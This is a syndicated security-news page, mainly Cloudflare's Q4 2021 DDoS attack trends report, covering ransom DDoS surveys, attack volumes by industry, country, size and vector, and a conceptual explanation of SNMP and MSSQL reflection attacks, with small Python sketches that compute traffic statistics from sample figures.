Apparent lack of urgency to provide support and phase in requirements for healthcare cybersecurity, despite ransomware proliferation during the pandemic. – Harley Geiger, Senior Director of Public Policy at Rapid7

Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/880807/rss

Security updates have been issued by Debian (ghostscript and roundcube), Fedora (gegl04, mbedtls, and mediawiki), openSUSE (kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-operator-container), SUSE (kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-operator-container and libvirt), and Ubuntu (apache2).

DDoS Attack Trends for Q4 2021

Post Syndicated from Omer Yoachimik original https://blog.cloudflare.com/ddos-attack-trends-for-2021-q4/

DDoS Attack Trends for Q4 2021

The first half of 2021 witnessed massive ransomware and ransom DDoS attack campaigns that interrupted aspects of critical infrastructure around the world (including one of the largest petroleum pipeline system operators in the US) and a vulnerability in IT management software whose exploitation targeted schools, the public sector, travel organizations, and credit unions, to name a few.

The second half of the year recorded the growing swarm of one of the most powerful botnets ever deployed (Meris), as well as record-breaking HTTP DDoS attacks and network-layer attacks observed over the Cloudflare network. This was in addition to the Log4j2 vulnerability (CVE-2021-44228), discovered in December, which allows an attacker to execute code on a remote server and is arguably one of the most severe vulnerabilities on the Internet since Heartbleed and Shellshock.

Prominent attacks such as the ones listed above are but a few examples that demonstrate a trend of intensifying cyber-insecurity that affected everyone, from tech firms and government organizations to wineries and meat processing plants.

Here are some DDoS attack trends and highlights from 2021 and Q4 ‘21 specifically:

Ransom DDoS attacks

  • In Q4, ransom DDoS attacks increased by 29% YoY and 175% QoQ.
  • In December alone, one out of every three survey respondents reported being targeted by a ransom DDoS attack or threatened by the attacker.

Application-layer DDoS attacks

  • The Manufacturing industry was the most attacked in Q4 ’21, recording a whopping 641% increase QoQ in the number of attacks. The Business Services and Gaming/Gambling industries were the second and third most targeted industries by application-layer DDoS attacks.
  • For the fourth time in a row this year, China topped the charts with the highest percentage of attack traffic originating from its networks.
  • A new botnet called the Meris botnet emerged in mid-2021 and continued to bombard organizations around the world, launching some of the largest HTTP attacks on record — including a 17.2M rps attack that Cloudflare automatically mitigated.

Network-layer DDoS attacks

  • Q4 ’21 was the busiest quarter for attackers in 2021. In December 2021 alone, there were more attacks than in all of Q2 ’21 and almost as many as in all of Q1 ’21.
  • While the majority of attacks were small, terabit-strong attacks became the new norm in the second half of 2021. Cloudflare automatically mitigated dozens of attacks peaking over 1 Tbps, with the largest one peaking just under 2 Tbps — the largest we’ve ever seen.
  • Q4 ’21, and November specifically, recorded a persistent ransom DDoS campaign against VoIP providers around the world.
  • Attacks originating from Moldova quadrupled in Q4 ’21 QoQ, making it the country with the highest percentage of network-layer DDoS activity.
  • SYN floods and UDP floods were the most frequent attack vectors while emerging threats such as SNMP attacks increased by nearly 5,800% QoQ.

This report is based on DDoS attacks that were automatically detected and mitigated by Cloudflare’s DDoS Protection systems. To learn more about how it works, check out this deep-dive blog post.

A note on how we measure DDoS attacks observed over our network

To analyze attack trends, we calculate the “DDoS activity” rate, which is the percentage of attack traffic out of the total traffic (attack + clean) observed over our global network. Measuring attack numbers as a percentage of the total traffic observed allows us to normalize data points and avoid biases reflected in absolute numbers towards, for example, a Cloudflare data center that receives more total traffic and likely, also more attacks.
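
As a concrete illustration of that normalization, here is a minimal sketch, using made-up sample figures rather than Cloudflare data, of how such a per-location rate could be computed:

```python
# Minimal sketch of the "DDoS activity" rate described above: attack traffic
# as a percentage of total (attack + clean) traffic, computed per location so
# that a large data center does not dominate the picture.
# The sample figures below are invented for illustration only.

def ddos_activity_rate(attack_packets: int, clean_packets: int) -> float:
    """Return attack traffic as a percentage of all observed traffic."""
    total = attack_packets + clean_packets
    return 100.0 * attack_packets / total if total else 0.0

samples = {
    "data-center-A": (1_200_000, 98_800_000),  # (attack, clean) packets
    "data-center-B": (300_000, 9_700_000),
}

for location, (attack, clean) in samples.items():
    print(f"{location}: {ddos_activity_rate(attack, clean):.2f}% attack traffic")
```

Note that data-center-B shows the higher activity rate even though data-center-A sees more attack packets in absolute terms, which is exactly the bias the normalization is meant to avoid.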

An interactive version of this report is available on Cloudflare Radar.

Ransom Attacks

Our systems constantly analyze traffic and automatically apply mitigation when DDoS attacks are detected. Each DDoS’d customer is prompted with an automated survey to help us better understand the nature of the attack and the success of the mitigation.

For over two years now, Cloudflare has been surveying attacked customers — one question on the survey being whether they received a ransom note demanding payment in exchange for stopping the DDoS attack. Q4 ’21 recorded the highest percentage of survey responses ever indicating ransom threats — ransom attacks increased by 29% YoY and 175% QoQ. More specifically, one out of every 4.5 respondents (22%) reported receiving a ransom letter from the attacker demanding payment.

The percentage of respondents that reported being targeted by a ransom DDoS attack or that received threats in advance of an attack.

When we break it down by month, we can see that December 2021 topped the charts with 32% of respondents reporting receiving a ransom letter — that’s nearly one out of every three surveyed respondents.

Application-layer DDoS attacks

Application-layer DDoS attacks, specifically HTTP DDoS attacks, are attacks that usually aim to disrupt a web server by making it unable to process legitimate user requests. If a server is bombarded with more requests than it can process, the server will drop legitimate requests and — in some cases — crash, resulting in degraded performance or an outage for legitimate users.

Application-layer DDoS attacks by industry

In Q4, DDoS attacks on Manufacturing companies increased by 641% QoQ, and DDoS attacks on the Business Services industry increased by 97%.

When we break down application-layer attacks by targeted industry, the Manufacturing, Business Services, and Gaming/Gambling industries were the most targeted in Q4 ’21.

Application-layer DDoS attacks by source country

To understand the origin of the HTTP attacks, we look at the geolocation of the source IP address belonging to the client that generated the attack HTTP requests. Unlike network-layer attacks, source IP addresses cannot be spoofed in HTTP attacks. A high percentage of DDoS activity in a given country usually indicates the presence of botnets operating from within the country’s borders.

For the fourth quarter in a row, China remains the country with the highest percentage of DDoS attacks originating from within its borders. More than three out of every thousand HTTP requests that originated from Chinese IP addresses were part of an HTTP DDoS attack. The US remained in second place, followed by Brazil and India.

Application-layer DDoS attacks by target country

In order to identify which countries are targeted by the most HTTP DDoS attacks, we bucket the DDoS attacks by our customers’ billing countries and represent each bucket as a percentage of all DDoS attacks.
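
As a tiny illustration of that bucketing (the country labels and counts below are invented, not figures from this report):

```python
# Sketch: bucket observed attacks by the targeted customer's billing country
# and express each bucket as a percentage of all attacks.
# Sample data is fabricated for illustration.
from collections import Counter

attack_billing_countries = ["US", "US", "DE", "CA", "US", "CA", "GB", "US"]

counts = Counter(attack_billing_countries)
total = sum(counts.values())

for country, n in counts.most_common():
    print(f"{country}: {100 * n / total:.1f}% of HTTP DDoS attacks")
```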

For the third consecutive time this year, organizations in the United States were targeted by the most HTTP DDoS attacks, followed by Canada and Germany.

Network-layer DDoS attacks

While application-layer attacks target the application (Layer 7 of the OSI model) running the service that end users are trying to access, network-layer attacks aim to overwhelm network infrastructure (such as in-line routers and servers) and the Internet link itself.

Cloudflare thwarts an almost 2 Tbps attack

In November, our systems automatically detected and mitigated an almost 2 Tbps DDoS attack. This was a multi-vector attack combining DNS amplification attacks and UDP floods. The entire attack lasted just one minute. The attack was launched from approximately 15,000 bots running a variant of the original Mirai code on IoT devices and unpatched GitLab instances.

Network-layer DDoS attacks by month

December was the busiest month for attackers in 2021.

Q4 ‘21 was the busiest quarter in 2021 for attackers. Over 43% of all network-layer DDoS attacks took place in the fourth quarter of 2021. While October was a relatively calm month, in November, the month of the Chinese Singles’ Day, the American Thanksgiving holiday, Black Friday, and Cyber Monday, the number of network-layer DDoS attacks nearly doubled. The number of observed attacks increased towards the final days of December ’21 as the world prepared to close out the year. In fact, the total number of attacks in December alone was higher than all the attacks in Q2 ’21 and almost equivalent to all attacks in Q1 ’21.

Network-layer DDoS attacks by attack rate

While most attacks are still relatively ‘small’ in size, terabit-strong attacks are becoming the norm.

There are different ways of measuring the size of an L3/4 DDoS attack. One is the volume of traffic it delivers, measured as the bit rate (specifically, terabits per second or gigabits per second). Another is the number of packets it delivers, measured as the packet rate (specifically, millions of packets per second).

Attacks with high bit rates attempt to cause a denial-of-service event by clogging the Internet link, while attacks with high packet rates attempt to overwhelm the servers, routers, or other in-line hardware appliances. These devices dedicate a certain amount of memory and computation power to process each packet. Therefore, by bombarding a device with more packets than it can handle, an attacker can exhaust its processing resources. In such a case, packets are “dropped,” i.e., the appliance is unable to process them. For users, this results in service disruptions and denial of service.
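
To make the two measurements concrete, here is a small back-of-the-envelope sketch; the packet sizes and rates are illustrative assumptions, not figures from this report:

```python
# Rough illustration of the two ways to size an L3/4 flood described above.
# bit rate = packet rate x average packet size x 8 bits per byte.
# All inputs are invented example values; real attacks vary widely.

def bit_rate_gbps(packet_rate_pps: float, avg_packet_bytes: float) -> float:
    """Approximate bit rate in Gbps from a packet rate and average packet size."""
    return packet_rate_pps * avg_packet_bytes * 8 / 1e9

# A packet-intensive flood: many small packets, modest bandwidth.
small_packets = bit_rate_gbps(packet_rate_pps=10_000_000, avg_packet_bytes=80)

# A bandwidth-intensive flood: fewer but larger (e.g. amplified) packets.
large_packets = bit_rate_gbps(packet_rate_pps=1_500_000, avg_packet_bytes=1_400)

print(f"10 Mpps of 80-byte packets    ~ {small_packets:.1f} Gbps")   # ~6.4 Gbps
print(f"1.5 Mpps of 1400-byte packets ~ {large_packets:.1f} Gbps")   # ~16.8 Gbps
```

A high packet rate can exhaust an appliance long before the link itself is saturated, which is why the report tracks both dimensions separately.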

The distribution of attacks by their size (in bit rate) and month is shown below. As seen in the graph above, the majority of attacks took place in December. However, the graph below illustrates that larger attacks, over 300 Gbps in size, took place in November. Most of the attacks between 5-20 Gbps took place in December.

Distribution by packet rate

An interesting correlation Cloudflare has observed is that when the number of attacks increases, their size and duration decrease. In the first two-thirds of 2021, the number of attacks was relatively small, and correspondingly, their rates increased, e.g., in Q3 ’21, attacks ranging from 1-10 million packets per second (mpps) increased by 196%. In Q4 ’21, the number of attacks increased and Cloudflare observed a decrease in the size of attacks. 91% of all attacks peaked below 50,000 packets per second (pps) — easily sufficient to take down unprotected Internet properties.

Larger attacks of over 1 mpps decreased by 48% to 28% QoQ, while attacks peaking below 50K pps increased by 2.36% QoQ.

Distribution by bit rate

Similar to the trend observed in packet-intensive attacks, the number of bit-intensive attacks shrank as well. While attacks over 1 Tbps are becoming the norm, with the largest one we’ve ever seen peaking just below 2 Tbps, the majority of attacks are still small and peaked below 500 Mbps (97.2%).

In Q4 ’21, larger attacks in all ranges above 500 Mbps saw massive decreases, ranging from 35% up to 57% for the largest (100+ Gbps) attacks.

Network-layer DDoS attacks by duration

Most attacks remain under one hour in duration, reiterating the need for automated always-on DDoS mitigation solutions.

We measure the duration of an attack by recording the difference between when it is first detected by our systems as an attack and the last packet we see with that attack signature towards that specific target. In the last quarter of 2021, 98% of all network-layer attacks lasted less than one hour. This is very common, as most attacks are short-lived. Moreover, a trend we’ve seen is that when the number of attacks increases, as in this quarter, their rate and duration decrease.
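
A minimal sketch of that bookkeeping, using hypothetical detections rather than Cloudflare's actual pipeline, might look like this:

```python
# Hypothetical sketch: attack duration measured as the gap between the first
# and last packets seen with a given attack signature towards a target.
from datetime import datetime, timedelta

# Made-up sample detections: (timestamp, attack signature)
events = [
    (datetime(2021, 12, 3, 14, 0, 5), "syn-flood:203.0.113.10"),
    (datetime(2021, 12, 3, 14, 0, 9), "syn-flood:203.0.113.10"),
    (datetime(2021, 12, 3, 14, 22, 41), "syn-flood:203.0.113.10"),
]

def attack_duration(events, signature) -> timedelta:
    times = [ts for ts, sig in events if sig == signature]
    return max(times) - min(times)

duration = attack_duration(events, "syn-flood:203.0.113.10")
print(duration, "-> under one hour:", duration < timedelta(hours=1))
```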

Short attacks can easily go undetected, especially burst attacks that, within seconds, bombard a target with a significant number of packets, bytes, or requests. In this case, DDoS protection services that rely on manual mitigation by security analysts have no chance of mitigating the attack in time. They can only learn from it in their post-attack analysis, then deploy a new rule that filters the attack fingerprint and hope to catch it next time. Similarly, using an “on-demand” service, where the security team redirects traffic to a DDoS provider during the attack, is also inefficient because the attack will already be over before the traffic routes to the on-demand DDoS provider.

It’s recommended that companies use automated, always-on DDoS protection services that analyze traffic and apply real-time fingerprinting fast enough to block short-lived attacks.

Attack vectors

SYN floods remain attackers’ favorite method of attack, while attacks over SNMP saw a massive surge of almost 5,800% QoQ.

An attack vector is a term used to describe the method that the attacker uses to launch their DDoS attack, i.e., the IP protocol, packet attributes such as TCP flags, flooding method, and other criteria.

For the first time in 2021, the percentage of SYN flood attacks significantly decreased. Throughout 2021, SYN floods accounted for 54% of all network-layer attacks on average. While still grabbing first place as the most frequent vector, its share dropped by 38% QoQ to 34%.

However, it was a close race between SYN attacks and UDP attacks. A UDP flood is a type of denial-of-service attack in which a large number of User Datagram Protocol (UDP) packets are sent to a targeted server with the aim of overwhelming that device’s ability to process and respond. Oftentimes, the firewall protecting the targeted server can also become exhausted as a result of UDP flooding, resulting in a denial of service to legitimate traffic. Attacks over UDP jumped from fourth place in Q3 ’21 to second place in Q4 ’21, with a share of 32% of all network-layer attacks, a 1,198% increase QoQ.

In third place came the SNMP underdog, which made a massive leap with its first appearance among the top attack vectors in 2021.

Emerging threats

When we look at emerging attack vectors — which helps us understand what new vectors attackers are deploying to launch attacks — we observe a massive spike in SNMP, MSSQL, and generic UDP-based DDoS attacks.

Both SNMP and MSSQL attacks are used to reflect and amplify traffic on the target by spoofing the target’s IP address as the source IP in the packets used to trigger the attack.

Simple Network Management Protocol (SNMP) is a UDP-based protocol that is often used to discover and manage network devices such as printers, switches, routers, and firewalls of a home or enterprise network, on well-known UDP port 161. In an SNMP reflection attack, the attacker sends out a large number of SNMP queries to devices on the network while spoofing the packets’ source IP address to that of the target; the devices, in turn, reply to the target’s address. The flood of responses from the devices on the network results in the target network being DDoSed.

Similar to the SNMP amplification attack, the Microsoft SQL (MSSQL) attack is based on a technique that abuses the Microsoft SQL Server Resolution Protocol for the purpose of launching a reflection-based DDoS attack. The attack occurs when a Microsoft SQL Server responds to a client query or request, attempting to exploit the Microsoft SQL Server Resolution Protocol (MC-SQLR), listening on UDP port 1434.
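
What makes these reflection vectors dangerous is amplification: a small spoofed request elicits a much larger response aimed at the victim. The back-of-the-envelope sketch below uses purely illustrative request and response sizes and reflector counts, not measured values for SNMP or MSSQL:

```python
# Illustrative amplification math for a generic UDP reflection attack.
# All sizes, rates, and reflector counts are assumptions for the example.

request_bytes = 60        # spoofed query sent to each reflector
response_bytes = 3_000    # response each reflector sends to the victim
amplification = response_bytes / request_bytes  # ~50x

reflectors = 10_000
queries_per_reflector_per_second = 50

victim_gbps = reflectors * queries_per_reflector_per_second * response_bytes * 8 / 1e9
print(f"Amplification factor: ~{amplification:.0f}x")
print(f"Traffic aimed at the victim: ~{victim_gbps:.1f} Gbps")  # ~12 Gbps
```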

Network-layer DDoS attacks by country

Attacks originating from Moldova quadrupled, making it the country with the highest percentage of network-layer DDoS activity.

When analyzing network-layer DDoS attacks, we bucket the traffic by the Cloudflare edge data center locations where the traffic was ingested, and not by the source IP. The reason for this is that, when attackers launch network-layer attacks, they can spoof the source IP address in order to obfuscate the attack source and introduce randomness into the attack properties, which can make it harder for simple DDoS protection systems to block the attack. Hence, if we were to derive the source country based on a spoofed source IP, we would get a spoofed country.

Cloudflare is able to overcome the challenges of spoofed IPs by displaying the attack data by the location of the Cloudflare data center in which the attack was observed. We are able to achieve geographical accuracy in our report because we have data centers in over 250 cities around the world.

To view all regions and countries, check out the interactive map.

Summary

Cloudflare’s mission is to help build a better Internet. A better Internet is one that is more secure, faster, and reliable for everyone — even in the face of DDoS attacks. As part of our mission, since 2017, we’ve been providing unmetered and unlimited DDoS protection for free to all of our customers. Over the years, it has become increasingly easier for attackers to launch DDoS attacks. To counter the attacker’s advantage, we want to make sure that it is also easy and free for organizations of all sizes to protect themselves against DDoS attacks of all types.

Not using Cloudflare yet? Start now.
